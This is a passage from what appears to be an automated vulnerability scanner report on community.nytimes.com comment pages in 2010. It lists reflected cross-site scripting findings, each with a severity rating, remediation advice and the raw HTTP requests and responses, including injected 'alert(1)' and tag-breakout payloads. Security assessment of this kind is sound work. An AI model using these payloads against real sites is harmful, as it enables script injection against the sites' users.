X-Powered-By: PHP/5.2.9
Content-Length: 34488
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Met Say ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com32dbf"><a>d7df2b346ed/yr/mo/day/met-says-levine-is-much-better-after-illness-forces-withdrawal/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink ...[SNIP]...
3.84. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64c7c"-alert(1)-"629b7b315c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/?64c7c"-alert(1)-"629b7b315c2=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 80298
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Met Say ...[SNIP]... t"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142517"; var s_pagename = "2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/?64c7c"-alert(1)-"629b7b315c2=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.85. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f3f'-alert(1)-'ada34236929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments95f3f'-alert(1)-'ada34236929/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71869
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Play Ab ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments95f3f'-alert(1)-'ada34236929'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.86. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9161"><a>5ab015563d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentse9161"><a>5ab015563d1/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71781
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Play Ab ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentse9161"><a>5ab015563d1/artsbeat.blogs.nytimes.com/yr/mo/day/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetprom ...[SNIP]...
3.87. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b71c9"><a>1e34a4fd54a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.comb71c9"><a>1e34a4fd54a/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34447
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Play Ab ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comb71c9"><a>1e34a4fd54a/yr/mo/day/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLin ...[SNIP]...
3.88. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bca7"-alert(1)-"2319875f975 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/?6bca7"-alert(1)-"2319875f975=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71297
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Play Ab ...[SNIP]... "; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142601"; var s_pagename = "2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/?6bca7"-alert(1)-"2319875f975=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.89. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51860"><a>6eafaae01f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments51860"><a>6eafaae01f/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 84159
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>'Spider ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments51860"><a>6eafaae01f/artsbeat.blogs.nytimes.com/yr/mo/day/spider-man-musical-teams-with-syfy-channel/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,S ...[SNIP]...
3.90. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bc00'-alert(1)-'307dd572ea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments1bc00'-alert(1)-'307dd572ea0/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 84201
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>'Spider ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments1bc00'-alert(1)-'307dd572ea0'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.91. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5a8f"><a>014e8107919 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.comc5a8f"><a>014e8107919/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33806
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>'Spider ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comc5a8f"><a>014e8107919/yr/mo/day/spider-man-musical-teams-with-syfy-channel/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom ...[SNIP]...
3.92. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f46b3"-alert(1)-"68d72677370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/?f46b3"-alert(1)-"68d72677370=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 81567
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>'Spider ...[SNIP]... mesglobal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142483"; var s_pagename = "2010/11/11/spider-man-musical-teams-with-syfy-channel/?f46b3"-alert(1)-"68d72677370=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.93. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4241c'-alert(1)-'33ecf65d4eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments4241c'-alert(1)-'33ecf65d4eb/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 120080
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Tangled ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments4241c'-alert(1)-'33ecf65d4eb'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
3.94. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78489"><a>817c3be883f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments78489"><a>817c3be883f/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 120314
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Tangled ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments78489"><a>817c3be883f/artsbeat.blogs.nytimes.com/yr/mo/day/tangled-web-of-rubicon-unravels-at-amc/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponL ...[SNIP]...
3.95. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d7d"><a>64403273679 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.comb8d7d"><a>64403273679/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33735
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Tangled ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comb8d7d"><a>64403273679/yr/mo/day/tangled-web-of-rubicon-unravels-at-amc/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bo ...[SNIP]...
3.96. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adb13"-alert(1)-"3ff71f84a46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/?adb13"-alert(1)-"3ff71f84a46=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 111743
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Tangled ...[SNIP]... nytimesglobal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142657"; var s_pagename = "2010/11/11/tangled-web-of-rubicon-unravels-at-amc/?adb13"-alert(1)-"3ff71f84a46=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
3.97. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 683a8"><a>11401750f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments683a8"><a>11401750f9d/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71155
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Book Re ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments683a8"><a>11401750f9d/artsbeat.blogs.nytimes.com/yr/mo/day/book-review-podcast-the-emperor-of-all-maladies/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpro ...[SNIP]...
3.98. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://community.nytimes.com
Path: /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d604c'-alert(1)-'959e8c51a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commentsd604c'-alert(1)-'959e8c51a4/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71222
